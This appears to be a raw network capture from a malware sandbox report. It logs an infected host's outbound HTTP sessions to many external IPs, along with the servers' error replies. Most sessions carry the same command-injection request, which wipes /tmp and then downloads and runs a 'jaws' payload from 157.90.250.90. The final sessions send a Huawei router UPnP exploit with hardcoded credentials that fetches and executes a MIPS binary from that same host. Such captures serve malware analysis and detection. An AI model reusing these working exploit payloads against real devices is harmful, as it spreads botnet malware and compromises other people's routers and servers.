                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:05 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:05 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 35 61 36 66 37 62 64 26 23 34 36 3b 31 37 30 34 31 37 33 31 30 35 26 23 34 36 3b 31 34 39 64 61 65 63 63 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;55a6f7bd&#46;1704173105&#46;149daecc</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          465192.168.2.234804652.31.77.17880
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:05.043016911 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:05.288970947 CET349INHTTP/1.1 503 Service Temporarily Unavailable
                                                          Server: awselb/2.0
                                                          Date: Tue, 02 Jan 2024 05:25:05 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 54 65 6d 70 6f 72 61 72 69 6c 79 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>503 Service Temporarily Unavailable</title></head><body><center><h1>503 Service Temporarily Unavailable</h1></center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          466192.168.2.235236245.243.32.10980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:05.266556978 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:05.599236965 CET619INHTTP/1.1 400 Bad Request
                                                          Server: Mini web server 1.0 ZTE corp 2005.
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Accept-Ranges: bytes
                                                          Connection: close
                                                          Cache-Control: no-cache,no-store
                                                          Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 54 4d 4c 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 48 32 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 32 3e 0a 59 6f 75 72 20 72 65 71 75 65 73 74 20 68 61 73 20 62 61 64 20 73 79 6e 74 61 78 20 6f 72 20 69 73 20 69 6e 68 65 72 65 6e 74 6c 79 20 69 6d 70 6f 73 73 69 62 6c 65 20 74 6f 20 73 61 74 69 73 66 79 2e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <HTML> <HEAD><TITLE>400 Bad Request</TITLE></HEAD> <BODY BGCOLOR="#FFFFFF" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"> <H2>400 Bad Request</H2>Your request has bad syntax or is inherently impossible to satisfy.</body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          467192.168.2.235690834.120.145.3280
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:06.732120037 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:06.855182886 CET441INHTTP/1.0 400 Bad Request
                                                          Content-Type: text/html; charset=UTF-8
                                                          Referrer-Policy: no-referrer
                                                          Content-Length: 273
                                                          Date: Tue, 02 Jan 2024 05:25:06 GMT
                                                          Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 68 32 3e 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>400 Bad Request</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Bad Request</h1><h2>Your client has issued a malformed or illegal request.</h2><h2></h2></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          468192.168.2.2352664154.37.215.11380
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:06.760411024 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:06.909641027 CET307INHTTP/1.1 400 Bad Request
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:06 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 150
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          469192.168.2.23472602.20.206.6980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:06.855559111 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:07.099633932 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:06 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:06 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 38 31 34 64 66 61 64 26 23 34 36 3b 31 37 30 34 31 37 33 31 30 36 26 23 34 36 3b 36 63 35 64 37 39 62 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;9814dfad&#46;1704173106&#46;6c5d79b4</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          470192.168.2.2352462154.38.247.12680
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:06.911218882 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:07.719211102 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:08.647078991 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:10.502815008 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:14.374293089 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:21.797365904 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:36.643151045 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          471192.168.2.2354758154.218.175.19080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:06.948020935 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:07.285723925 CET327INHTTP/1.1 302 Moved Temporarily
                                                          Server: nginx
                                                          Date: Tue, 02 Jan 2024 05:25:06 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 138
                                                          Connection: keep-alive
                                                          Location: http://www.baidu.com/
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          472192.168.2.233771423.57.244.12980
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:07.005656004 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:07.401248932 CET431INHTTP/1.0 400 Bad Request
                                                          Server: AkamaiGHost
                                                          Mime-Version: 1.0
                                                          Content-Type: text/html
                                                          Content-Length: 209
                                                          Expires: Tue, 02 Jan 2024 05:25:07 GMT
                                                          Date: Tue, 02 Jan 2024 05:25:07 GMT
                                                          Connection: close
                                                          Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 26 23 39 31 3b 6e 6f 26 23 33 32 3b 55 52 4c 26 23 39 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 34 32 31 30 66 31 37 26 23 34 36 3b 31 37 30 34 31 37 33 31 30 37 26 23 34 36 3b 31 64 32 32 35 32 32 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                          Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "&#91;no&#32;URL&#93;", is invalid.<p>Reference&#32;&#35;9&#46;b4210f17&#46;1704173107&#46;1d225220</BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          473192.168.2.234830038.3.104.6080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:07.011141062 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:07.166940928 CET338INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.18.0 (Ubuntu)
                                                          Date: Tue, 02 Jan 2024 05:25:56 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 162
                                                          Connection: keep-alive
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          474192.168.2.2338840200.52.65.8080
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:07.011267900 CET232OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:07.167390108 CET490INHTTP/1.1 400 Bad Request
                                                          Content-Type: text/html; charset=us-ascii
                                                          Server: Microsoft-HTTPAPI/2.0
                                                          Date: Tue, 02 Jan 2024 05:25:07 GMT
                                                          Connection: close
                                                          Content-Length: 311
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          475192.168.2.234943450.212.190.9780
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:07.021194935 CET244OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 157.90.250.90/jaws;sh+/tmp/jaws HTTP/1.1
                                                          User-Agent: Hello, world
                                                          Host: 127.0.0.1:80
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                          Connection: keep-alive
                                                          Jan 2, 2024 06:25:07.192800999 CET59INHTTP/1.1 400 Bad Request
                                                          Connection: close


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          476192.168.2.2337352156.247.20.25537215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:07.990796089 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:09.542967081 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 